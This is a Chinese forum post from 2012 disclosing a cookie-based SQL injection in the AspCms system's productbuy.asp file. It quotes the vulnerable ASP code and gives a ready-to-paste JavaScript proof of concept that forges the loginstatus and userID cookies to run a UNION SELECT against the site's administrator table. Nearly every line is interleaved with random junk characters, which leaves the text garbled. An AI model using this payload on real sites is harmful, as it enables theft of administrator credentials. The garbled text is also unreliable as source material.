好久没上土司了,上来一看发现在删号名单内.....
! a3 H2 C1 X* B- @' n6 q也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
6 J# I8 A# q. R% J0 D& j废话不多说,看代码:" I F- C: \9 x$ r6 E: S8 u |
9 h! k4 i, H1 q: Q
<%+ \- u+ Q, E( m8 y7 M& P& ]( U. m
& L/ l$ \% a& M8 k2 \- Iif action = "buy" then
. M: Y" }( i) l; `5 z) w$ l6 Q4 ]- l
addOrder()4 I8 b5 g+ E* p$ T& |$ a( M% m
5 T1 e. ]* {8 }3 ]else8 v3 f: L' s z: X
" O! A; h) Z. h2 g$ Q2 A3 K9 F6 S echoContent()
: ?/ I8 ?% i- n* _) D+ l/ |# Q! E. `6 e; @/ l# p; E% X& z+ K
end if, ^% l2 y( R o
! [& w; [" k, j2 a8 Z
0 {! L1 ]+ j$ s. }2 ^! N: T8 {* ~% T/ z
8 r" w- p8 [# H% x! w, f$ b……略过9 T$ P' ^# a& F0 a; M6 e
% Z& c# k; U3 c l9 f' R
! ]. ^( U+ k' ]" e% D9 c) }/ c
5 Y- P' m4 u: v/ I8 VSub echoContent()# O% m; N% s' I9 F. n4 R, [
. I( a: ]& e. I) f dim id h( m6 u8 [8 q5 }: W7 ?# v
9 a) c; D A& @7 J
id=getForm("id","get")
/ I: d7 n5 o; }# n, _/ p, r' ?: Y( d
' R6 z" D" j8 U! T4 |
7 n5 r% L; \9 U+ e' X4 }# L" ~. V6 q- P/ W( F
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
p/ c$ w$ q' U: e7 y
1 r+ n/ m% f9 E; x( A1 e( Q
' a2 y8 \: R) g6 N9 V* E9 N, h8 u( t+ c/ Y* V
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")1 l6 M# G* v7 e( @; n& D: L5 @
4 k" N% f9 f+ H2 B, s dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct( x/ I9 Y; h% D8 R2 n; {- E
( _4 C* k- [* F
Dim templatePath,tempStr
2 [ l v6 {, y y0 n, v3 y$ X
2 z/ I1 o- ]; D2 N4 v4 b' V5 z templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"1 l+ A1 i# v- z8 c7 t
; o8 w0 z U+ r" @6 Q& J
' a/ q q/ P) s! m) U& k
8 d0 J: C, M. F3 D% m set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
3 h) X: D" X' X' n4 t3 ]
# ^& T! D. M, U9 L selectproduct=rsObj(0)# L+ K' u# g! C0 B2 k0 N
& a% o6 z) X+ `8 d# ~ ~, _* V( d( b
! `( j: c1 n8 d' H9 Y
9 Z0 R$ Z8 M9 ~* v1 R
Dim linkman,gender,phone,mobile,email,qq,address,postcode( X8 b' T' T3 F& P
# \% B0 ]5 _/ R+ ?) p if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
- I# w' {, S: A2 J0 R5 p: R4 a- D/ p! N) X1 `
if rCookie("loginstatus")=1 then
& k/ L5 t& l, S8 W% P8 m+ b& u
+ @) w' ]6 S* i+ a* B" e set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")% y0 h: Y5 _. ?" [# S
& T( u( G5 i) b, O& N$ i$ X linkman=rsObj("truename")
" A7 B1 {4 d( t- |9 f. l6 O2 F3 r# F) ]# Z0 }: F1 \1 d
gender=rsObj("gender")
! W- C+ R! T! L5 B3 v$ E' p8 p! _) ~0 X& e) r+ J* L: R1 y
phone=rsObj("phone")
6 [6 B: z3 W' V7 X; `
4 |3 @; |1 g# y8 e) Z Q mobile=rsObj("mobile")/ W$ L* D1 ~* c% Z6 E+ k
5 o, L) {/ }- j, `; J
email=rsObj("email")
6 C! Q8 |! z5 a$ t6 l
4 d- r' l; q% Z2 y; c qq=rsObj("qq")1 d7 S7 G6 {* B4 ?
: w: T; Z/ `" P9 {# u7 S address=rsObj("address")* X/ ^2 M; g; U1 D c, O
8 U: k- d' @& a. ?& M* l2 L postcode=rsObj("postcode")2 m R2 u& Y2 W
/ {! w j, C" T3 C
else
8 T' N' T( r5 C; U0 b; {" X* B2 A3 H, z7 ~/ Y
gender=1
9 ~- {- }% [8 o3 v( i! `$ p7 ]8 Y# \( y7 K0 O
end if
9 h8 n$ c3 h6 p: B% B% {+ i6 G
y: P6 {" j4 z' t5 Q rsObj.close()% z) u' \% J D2 S
3 S. X/ A; Y3 S& f# C, X0 ^- B, ?
, O5 ^9 ]. k7 d0 X/ s# E$ }) J4 x h6 m6 O4 z3 w h5 ^
with templateObj # N5 @6 Y/ G" q% k3 K! r
1 Z% x: o- `, ]% h .content=loadFile(templatePath)
1 r2 r3 R) i1 b: v. S) V B1 E) U" c% F
.parseHtml()! _/ t& l0 g9 e
0 |: @! _5 e& R4 S
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)' h% S& h$ P+ R3 o4 Y
$ P5 g0 b0 B; z3 M# ]6 Q
.content=replaceStr(.content,"[aspcms:linkman]",linkman)
3 Y9 i1 P( |8 `8 S& v7 f. o4 \9 K6 g: i3 H; ^
.content=replaceStr(.content,"[aspcms:gender]",gender)
; d1 ~( h# x C
6 h% ~9 J3 [- Y M4 X1 Z .content=replaceStr(.content,"[aspcms:phone]",phone)
d2 u* @6 C3 r, y. q' d- j6 J! k! A2 Y- E& C8 `
.content=replaceStr(.content,"[aspcms:mobile]",mobile) A N3 p; L* X
0 D X* p9 L; K) w& O .content=replaceStr(.content,"[aspcms:email]",email) ( m" V9 z3 u3 ]$ S9 j& c
5 g3 O' ~, Z0 N m' @ .content=replaceStr(.content,"[aspcms:qq]",qq) ( g, M1 ]7 I- l# s6 H
# t a0 w0 {# m3 p% ~; T .content=replaceStr(.content,"[aspcms:address]",address)
! W: W& Y8 ~, u
: G3 G: N3 A6 b6 U+ m .content=replaceStr(.content,"[aspcms:postcode]",postcode)
& J/ [9 K& y' C# U& `5 C+ `
2 {" t- x( t- G1 c ] .parseCommon() 4 k( J3 v' ?" q$ I3 z
/ E e2 a1 t( M1 { echo .content
( E" _4 a- G% X. j' }# E& h; [
5 w& l* Y. q9 H! d1 S( b end with
1 Y1 j7 g' u% l1 `6 O* N- A7 A, p! l3 N6 y# K* |3 v% u
set templateobj =nothing : terminateAllObjects
% |% ?& H, p- c: |1 K# P. }! i# B% |7 I& H
End Sub
8 ]+ j, u! U8 B漏洞很明显,没啥好说的: n8 t) P; i1 T+ x
poc:1 ~# Y5 \0 M- w5 t+ v2 a
* F! } X+ L5 G" O. L1 n+ y
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子; n, e- }2 U: T' W2 k) j- `
3 T) x6 _- Z9 t |
发表于 2012-12-27 08:35:05
收藏
支持
反对